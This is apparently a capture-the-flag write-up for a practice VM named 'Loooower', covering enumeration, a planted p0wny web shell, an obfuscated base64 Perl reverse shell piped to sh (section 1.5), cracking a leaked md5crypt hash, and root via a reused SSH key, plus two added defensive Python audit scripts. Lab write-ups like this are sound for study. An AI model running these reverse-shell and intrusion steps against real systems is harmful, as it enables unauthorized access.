1. looooower

1. Information gathering

┌──(root㉿kali)-[~]
└─# nmap -sCV 192.168.56.103                   
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-16 00:56 EDT
Nmap scan report for 192.168.56.103
Host is up (0.000080s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.102
|      Logged in as ftp
|      TYPE: ASCII
|      Session bandwidth limit in byte/s is 102400
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 106      113          4096 May 15 08:03 confidential
|_drwxr-xr-x    2 106      113          4096 May 15 07:37 uploads
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:AF:68:12 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.84 seconds

1.1. FTP anonymous login

┌──(root㉿kali)-[~]
└─# ftp 192.168.56.103        
Connected to 192.168.56.103.
220 (vsFTPd 3.0.3)
Name (192.168.56.103:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||51923|)
150 Here comes the directory listing.
drwxr-xr-x    2 106      113          4096 May 15 08:03 confidential
drwxr-xr-x    2 106      113          4096 May 15 07:37 uploads


┌──(root㉿kali)-[~]
└─# cat passwd                   
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
ftp:x:106:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
ftpuser:x:1001:1001::/home/ftpuser:/bin/bash
┌──(root㉿kali)-[~]
└─# cat hosts           
127.0.0.1       localhost
127.0.1.1       Loooower  dev.loooower

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

1.2. Configure hosts

┌──(root㉿kali)-[~]
└─# curl dev.loooower
<!DOCTYPE html>
<html>
<head>
    <title>Nothing here</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            margin-top: 100px;
            color: #333;
        }
        h1 {
            font-size: 3em;
            margin-bottom: 20px;
        }
        p {
            font-size: 1.2em;
        }
        .comment {
            color: #999;
            font-size: 0.8em;
            margin-top: 50px;
        }
    </style>
</head>
<body>
    <h1>Nothing here</h1>
    <p>This page is intentionally left blank.</p>
    
    <!-- Tm90aGluZyBoZXJlIGFnYWlu -->
</body>
</html>
┌──(root㉿kali)-[~]
└─# echo 'Tm90aGluZyBoZXJlIGFnYWlu' |base64 -d
Nothing here again

1.3. Directory scan

┌──(root㉿kali)-[~]
└─# dirsearch -u  dev.loooower -x 403          
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/_dev.loooower/_25-05-16_01-31-24.txt

Target: http://dev.loooower/

[01:31:24] Starting: 
[01:31:43] 200 -    4KB - /shell.php

Task Completed

1.4. shell.php

Pasted image 20250516133715

Went straight to GitHub to search for this; it is most likely an open-source backdoor shell, since no normal person building a box would write this much code by hand.
GitHub - flozz/p0wny-shell at 788b3d2b3d369a42e82b04686ed4054da74d37bf

I was overthinking it. It turns out to be very simple: just browse to it and it works.
Pasted image 20250516140227
Anyone could do it.

1.5. Reverse shell

echo cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTkyLjE2OC41Ni4xMDIiOyRwPTQ0NDQ7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygic2ggLWkiKTt9Oyc= |base64 -d |sh

1.6. User flag

(remote) www-data@Loooower:/home/welcome$ ls
backup.sh  user.txt
(remote) www-data@Loooower:/home/welcome$ cat user.txt 
flag{user-ea03b17fbd2c5e4895ba0775348cc1a5}

2. Privilege escalation

2.1. backup.sh

(remote) www-data@Loooower:/home/welcome$ cat backup.sh 
#!/bin/bash
# Backup Script v1.0
# Usage: ./backup.sh [source_dir] [dest_dir]

# Check for required arguments
if [ $# -ne 2 ]; then
    echo "Usage: $0 <source_dir> <dest_dir>"
    exit 1
fi

# Verify source directory exists
if [ ! -d "$1" ]; then
    echo "Error: Source directory $1 not found"
    exit 1
fi

# Create destination directory if needed
mkdir -p "$2" || { echo "Error: Cannot create destination directory"; exit 1; }

# Generate timestamp
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
BACKUP_NAME="backup_${TIMESTAMP}.tar.gz"

# Create backup
echo "Creating backup $BACKUP_NAME from $1..."
tar -czf "$2/$BACKUP_NAME" "$1" 2>/dev/null

# Verify backup was created
if [ $? -ne 0 ]; then
    echo "Error: Backup failed"
    exit 1
fi

# Calculate and display backup size
BACKUP_SIZE=$(du -h "$2/$BACKUP_NAME" | cut -f1)
echo "Backup completed successfully. Size: $BACKUP_SIZE"

# Cleanup old backups (keep last 5)
echo "Rotating backups..."
ls -t "$2"/backup_*.tar.gz | tail -n +6 | xargs rm -f

# The password for welcome is: $1$WP/Vj663$ZRtzxrX16pybyzam5Xmdi0
# Store this securely and don't commit to version control

exit 0
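The comment at the bottom of backup.sh is the credential leak that the next section cracks. As an added example (not part of the writeup), a small scanner that flags Unix crypt hashes and credential keywords in scripts, run here on a constructed excerpt of that file; it also recognises the sha256crypt and sha512crypt forms, which the page does not show:

```python
import re

# Constructed excerpt of the backup.sh shown above (sample input for this example).
SAMPLE_SCRIPT = """#!/bin/bash
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
tar -czf "$2/$BACKUP_NAME" "$1" 2>/dev/null
ls -t "$2"/backup_*.tar.gz | tail -n +6 | xargs rm -f
# The password for welcome is: $1$WP/Vj663$ZRtzxrX16pybyzam5Xmdi0
# Store this securely and don't commit to version control
exit 0
"""

# Modular-crypt hashes: $1$ md5crypt, $5$ sha256crypt, $6$ sha512crypt,
# each with an optional rounds= field and a salt of up to 16 characters.
CRYPT_HASH = re.compile(
    r"\$(?P<id>[156])\$(?:rounds=\d+\$)?[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{22,86}"
)
# Lower-confidence signal: a line that talks about credentials at all.
KEYWORD = re.compile(r"\b(?:password|passwd|secret|token|api[_-]?key)\b", re.I)

# Algorithm name and hashcat mode per hash id, for the triage report.
HASH_INFO = {"1": ("md5crypt", 500), "5": ("sha256crypt", 7400), "6": ("sha512crypt", 1800)}

def scan_text(text):
    """Return one finding dict per suspicious line of a script."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hashes = list(CRYPT_HASH.finditer(line))
        for m in hashes:
            name, mode = HASH_INFO[m.group("id")]
            findings.append({"line": lineno, "kind": "crypt-hash", "algo": name,
                             "hashcat_mode": mode, "value": m.group(0)})
        if not hashes and KEYWORD.search(line):
            findings.append({"line": lineno, "kind": "keyword", "value": line.strip()})
    return findings

def scan_file(path):
    """Scan a script on disk with the same rules."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read())
```

Run it over cron scripts and backup helpers as a periodic check; a crypt-hash finding in a world-readable file deserves the same response as a leaked password.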

2.2. Cracking the welcome user's hash

hashcat.exe hash.txt rockyou.txt

$1$WP/Vj663$ZRtzxrX16pybyzam5Xmdi0:alexis15

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$WP/Vj663$ZRtzxrX16pybyzam5Xmdi0
Time.Started.....: Fri May 16 14:15:35 2025 (0 secs)
Time.Estimated...: Fri May 16 14:15:35 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   665.6 kH/s (9.02ms) @ Accel:32 Loops:250 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 98304/14344387 (0.69%)
Rejected.........: 0/98304 (0.00%)
Restore.Point....: 49152/14344387 (0.34%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidate.Engine.: Device Generator
Candidates.#1....: truefriend -> FANNY
Hardware.Mon.#1..: Temp: 54c Util: 99% Core:2550MHz Mem:8001MHz Bus:8

Started: Fri May 16 14:15:22 2025
Stopped: Fri May 16 14:15:36 2025

Log in as the welcome user.

welcome@Loooower:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for welcome: 
Matching Defaults entries for welcome on Loooower:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Loooower:
    (ALL) PASSWD: /usr/bin/figlet

Found this figlet entry; nothing on GTFOBins, and after looking at its options there isn't much to exploit.

2.3. Private key login

It really has been a long time since I did a box. I didn't think of using the private key to log in as root directly; only after watching the group owner's video did I realise you can just ssh.
At the time I derived the public key from the private key to look at the username, saw it wasn't root and skipped it.
Pasted image 20250516215426

welcome@Loooower:~/.ssh$ ssh -i id_rsa root@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:IV6iZTL6D//1Ojh0d8XoSMepPgjyUfV/FpQmf3q35Hg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Linux Loooower 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 15 08:42:54 2025 from 192.168.3.94
root@Loooower:~# cat /root/root.txt 
flag{root-cd519e63e450d863e5ee02814bae016d}


root@Loooower:~/.ssh# cat authorized_keys 
ssh-rsa <public key omitted> welcome@Loooower
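Root's authorized_keys holding the welcome user's own public key is the misconfiguration that made the last step work. As an added audit script (not from the writeup), this flags any key trusted by both root and an unprivileged user; the key blobs and files below are constructed sample data, not the box's real key:

```python
import base64
import hashlib

def _fake_ed25519_blob(seed):
    """Constructed ssh-ed25519 wire blob (not a real key) used only as sample input."""
    pub = hashlib.sha256(seed).digest()  # 32 arbitrary bytes stand in for the public point
    wire = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + pub
    return base64.b64encode(wire).decode()

WELCOME_BLOB = _fake_ed25519_blob(b"welcome")
OTHER_BLOB = _fake_ed25519_blob(b"admin-laptop")
# Constructed sample files mirroring the page: root's file trusts welcome's own key.
ROOT_AK = f"ssh-ed25519 {OTHER_BLOB} admin@laptop\nssh-ed25519 {WELCOME_BLOB} welcome@Loooower\n"
WELCOME_AK = f"ssh-ed25519 {WELCOME_BLOB} welcome@Loooower\n"

KEY_PREFIXES = ("ssh-", "ecdsa-", "sk-")

def parse_authorized_keys(text):
    """Return (keytype, blob, comment) per entry; a leading options field is skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        for i, tok in enumerate(parts):
            if tok.startswith(KEY_PREFIXES) and i + 1 < len(parts):
                entries.append((tok, parts[i + 1], " ".join(parts[i + 2:])))
                break
    return entries

def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of a base64 key blob."""
    digest = hashlib.sha256(base64.b64decode(blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def audit_root_keys(root_text, user_texts):
    """Report every key in root's authorized_keys that also authorizes a non-root user."""
    owners = {}
    for user, text in user_texts.items():
        for _, blob, _ in parse_authorized_keys(text):
            owners.setdefault(fingerprint(blob), set()).add(user)
    findings = []
    for keytype, blob, comment in parse_authorized_keys(root_text):
        fp = fingerprint(blob)
        for user in sorted(owners.get(fp, ())):
            findings.append(f"{fp} ({comment or keytype}) is trusted by root and by {user}")
    return findings
```

On a real host, feed it /root/.ssh/authorized_keys and each /home/*/.ssh/authorized_keys; any finding means a compromise of that user's private key is a compromise of root.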